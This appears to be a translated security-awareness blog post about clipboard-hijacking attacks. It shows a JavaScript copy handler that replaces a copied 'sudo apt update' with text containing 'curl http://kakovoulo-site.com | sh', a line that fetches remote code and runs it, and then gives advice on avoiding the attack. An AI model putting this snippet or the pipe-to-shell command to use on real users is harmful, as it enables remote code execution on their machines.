How they can violate you with a simple copy-paste


An unusual hacking demonstration will make you think twice before copying or pasting any text.

copaste

This is why you should NEVER copy pasting commands directly to your terminal. Ask any developer or administrator if they have ever copied a command line or code snippet from the web. The answer would probably be YES. You'll assume what you copied is what you paste, right? Well, no!

You think you are copying one thing, but it is being replaced by something else, such as malicious code. All you need is a single line of code inserted into the code you copied to create a backdoor in your application.

This attack is very simple but can cause great damage. Let's see how it works in practice:

Thanks to Harel Friedlander for recording this video.

Suppose you are looking for how to update your ubuntu and found the following command, Copy it. Try it - copy and paste the following command:

$ sudo apt update

 

Here is the JavaScript running exploit.

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',
        'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
    );
    e.preventDefault();
});

How can I protect myself?

The safest way is to paste nothing from the web into your terminal. Another option is to add "#" before pasting, this will turn the command into a "comment" and will not execute it. This way you will see what you will paste before your terminal runs. You can of course paste the command into a txt file before putting it in your terminal.
Also many terminals can be configured not to run automatically when you paste a "\ n" (new line)

The above was just one example of why awareness raising is necessary to avoid any intrusion. There are many examples of really malicious scripts circulating on the internet.

Registration in iGuRu.gr via Email

Enter your email to subscribe to the email notification service for new posts.


Read them Technology News from all over the world, with the validity of iGuRu.gr

Follow us on Google News iGuRu.gr at Google news